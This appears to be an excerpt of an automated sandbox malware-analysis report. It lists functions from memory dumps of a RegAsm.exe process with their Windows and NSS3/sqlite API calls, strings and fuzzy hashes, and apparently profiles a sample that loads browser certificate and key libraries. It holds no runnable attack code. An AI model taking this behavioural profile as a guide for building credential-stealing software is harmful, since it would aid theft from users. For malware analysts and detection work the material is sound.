Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: 4c3cdf298d727e75fc17b05e16df4c2533805ffc632fa59ef15d3e4aa307ec0d
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: 87F0F03224C2119BC7206F66ECC298BBB94EB447A0F150127F909DB741DA34EC4087B8

Function 00418477 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7be28913b008f2ae96c40d4c3cbdea9f3bf0fa10d656430b6d84dc5aab22f8
Instruction ID: d620d3b89a26654d629d90f14f46075588c5e55284dab618a13e253092a7b73d
Opcode Fuzzy Hash: 4a7be28913b008f2ae96c40d4c3cbdea9f3bf0fa10d656430b6d84dc5aab22f8
Instruction Fuzzy Hash: DF516471D05201BBCB717BAE454AAF5B2E1AF70328B14019FF414AA233AF6D4DC44E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 20eede1ec08166350aa84aaeaf6f89484e694a41dc1ff05f9af6969ada57dca3
Instruction ID: 156c1dbbae43fd1d0a321c185995a6c07ec42adcafd6aa93e4d61e548de03cb5
Opcode Fuzzy Hash: 20eede1ec08166350aa84aaeaf6f89484e694a41dc1ff05f9af6969ada57dca3
Instruction Fuzzy Hash: 57F03A71E1015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 2fa73a2938dc3c0491f5427acf8d7001b7904e631cbaf8597fe0ef56ad187ad8
Instruction ID: 074d44534fbd0e3dd8e2e790cb0091cd77f8033ebee76f0ae907b77f1a728c48
Opcode Fuzzy Hash: 2fa73a2938dc3c0491f5427acf8d7001b7904e631cbaf8597fe0ef56ad187ad8
Instruction Fuzzy Hash: B9E09AB0D0420EAFCF44EFA8D5152DDBAF8BF08308F00916AC115F7240E77442458FA9

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C166E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C2B2120,6C167E60), ref: 6C166EBC
TlsGetValue.KERNEL32 ref: 6C166EDF
EnterCriticalSection.KERNEL32(?), ref: 6C166EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C166F25

Part of subcall function 6C13A900: TlsGetValue.KERNEL32(00000000,?,6C2B14E4,?,6C0D4DD9), ref: 6C13A90F
Part of subcall function 6C13A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C13A94F

PR_Unlock.NSS3 ref: 6C166F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C166FA9
TlsGetValue.KERNEL32 ref: 6C1670B4
EnterCriticalSection.KERNEL32(?), ref: 6C1670C8
PR_CallOnce.NSS3(6C2B24C0,6C1A7590), ref: 6C167104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C167117
SECOID_Init.NSS3 ref: 6C167128
PORT_Alloc_Util.NSS3(00000057), ref: 6C16714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C16717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1671A9
PR_NotifyAllCondVar.NSS3 ref: 6C1671CF
PR_Unlock.NSS3 ref: 6C1671DD
free.MOZGLUE(?), ref: 6C1671EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C167208
free.MOZGLUE(00000000), ref: 6C167221
free.MOZGLUE(00000001), ref: 6C167235
TlsGetValue.KERNEL32 ref: 6C16724A
EnterCriticalSection.KERNEL32(?), ref: 6C16725E
PR_NotifyCondVar.NSS3 ref: 6C167273
PR_Unlock.NSS3 ref: 6C167281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C167291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1672B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1672D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1672E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C167301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C167310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C167335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C167344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C167363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C167372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C2A0148,,defaultModDB,internalKeySlot), ref: 6C1674CC
free.MOZGLUE(00000000), ref: 6C167513
free.MOZGLUE(00000000), ref: 6C16751B
free.MOZGLUE(00000000), ref: 6C167528
free.MOZGLUE(00000000), ref: 6C16753C
free.MOZGLUE(00000000), ref: 6C167550
free.MOZGLUE(00000000), ref: 6C167561
free.MOZGLUE(00000000), ref: 6C167572
free.MOZGLUE(00000000), ref: 6C167583
free.MOZGLUE(00000000), ref: 6C167594
free.MOZGLUE(00000000), ref: 6C1675A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C1675BD
free.MOZGLUE(00000000), ref: 6C1675C8
free.MOZGLUE(00000000), ref: 6C1675F1
PR_NewLock.NSS3 ref: 6C167636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C167686
PR_NewLock.NSS3 ref: 6C1676A2

Part of subcall function 6C2198D0: calloc.MOZGLUE(00000001,00000084,6C140936,00000001,?,6C14102C), ref: 6C2198E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C1676B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C167707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C16771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C167731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C16774A
DeleteCriticalSection.KERNEL32(?), ref: 6C167770
free.MOZGLUE(?), ref: 6C167779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C16779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1677AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C1677C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C1677DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C167821
PORT_Alloc_Util.NSS3(?), ref: 6C167837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C16785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C16786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C1678AC
free.MOZGLUE(00000000), ref: 6C1678BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C1678F3
free.MOZGLUE(00000000), ref: 6C1678FC
free.MOZGLUE(00000000), ref: 6C16791C

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

Strings

kbi., xrefs: 6C167886
extern:, xrefs: 6C16772B
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C1674C7
Spac, xrefs: 6C167389
dll, xrefs: 6C16788E
dbm:, xrefs: 6C167716
NSS Internal Module, xrefs: 6C1674A2, 6C1674C6
,defaultModDB,internalKeySlot, xrefs: 6C16748D, 6C1674AA
sql:, xrefs: 6C1676FE
rdb:, xrefs: 6C167744

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 020d478a9aa83299057ce49d44c40deace57ffe07577cf5a44b6d059880a7703
Instruction ID: 28a7668c646366e3c4bc07d2d92d947f2135297c8dac26c6397696dda07bb11c
Opcode Fuzzy Hash: 020d478a9aa83299057ce49d44c40deace57ffe07577cf5a44b6d059880a7703
Instruction Fuzzy Hash: D05211B1E003059BEF119FAADC097AE7BB4AF1530CF14412AED19A6A81E731D964CBD1

Function 6C176D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C27A8EC,0000006C), ref: 6C176DC6
memcpy.VCRUNTIME140(?,6C27A958,0000006C), ref: 6C176DDB
memcpy.VCRUNTIME140(?,6C27A9C4,00000078), ref: 6C176DF1
memcpy.VCRUNTIME140(?,6C27AA3C,0000006C), ref: 6C176E06
memcpy.VCRUNTIME140(?,6C27AAA8,00000060), ref: 6C176E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C176E38

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C176E76
TlsGetValue.KERNEL32 ref: 6C17726F
EnterCriticalSection.KERNEL32(?), ref: 6C177283

Strings

!, xrefs: 6C177123

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: b08dd5ccf5b6c61ec0a5d5587bb6ab6e1113a90f15cbda6c1d982ee42f2a88dc
Instruction ID: 3e00951f1e1452af42ab79b9b98cdf1fb76cbd351430157862475924706f1ced
Opcode Fuzzy Hash: b08dd5ccf5b6c61ec0a5d5587bb6ab6e1113a90f15cbda6c1d982ee42f2a88dc
Instruction Fuzzy Hash: 49729D75D052189FDF61DF28CC8879ABBB5EB49304F1441E9E80CA7741EB35AA84CFA0

Function 6C0E3C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0E3C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C0E3D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0E3EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0E3ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0E3F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0E4052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0E406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C0E410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0E449C

Strings

%s at line %d of [%.10s], xrefs: 6C0E4495, 6C0E44F9, 6C0E459E, 6C0E4769, 6C0E4809
database corruption, xrefs: 6C0E4490, 6C0E44F4, 6C0E4599, 6C0E4764, 6C0E4804
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0E4452, 6C0E4486, 6C0E44EA, 6C0E4571, 6C0E4580, 6C0E458F, 6C0E475A, 6C0E47FA

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: ece87327b5bbe783a3ee8e1e106bcfaa6e6467ca38b289bb3e3d264014b049bd
Instruction ID: 5dc45780098091a93c79763fbcac64d577a5214961c6cef9312f7191e9b206ff
Opcode Fuzzy Hash: ece87327b5bbe783a3ee8e1e106bcfaa6e6467ca38b289bb3e3d264014b049bd
Instruction Fuzzy Hash: 7A827E75A442099FCB04CFA9C480B9EB7F2BF4D318F6581A9D905ABB61D731EC42CB91

Function 6C1BAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C1BACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C1BACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C1BACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C1BAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C1BADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BADF0

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1BB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1BB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1BB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C1BB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1BB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BB40C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 8ee49e94752b0b13a0484b006fca195184c32f2d308ec8babc23f7e0f46c0e55
Instruction ID: ef888e0f4df8682822ff573d8e9933fdcba2f9d60d3c55ff703aa0fe6dc5ec6c
Opcode Fuzzy Hash: 8ee49e94752b0b13a0484b006fca195184c32f2d308ec8babc23f7e0f46c0e55
Instruction Fuzzy Hash: DA22A071904301AFE710CF14CC84BAA77E1AF9430CF24856CE8596BB92E772E959CF92

Function 6C13ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C13ED38

Part of subcall function 6C0D4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0D4FC4

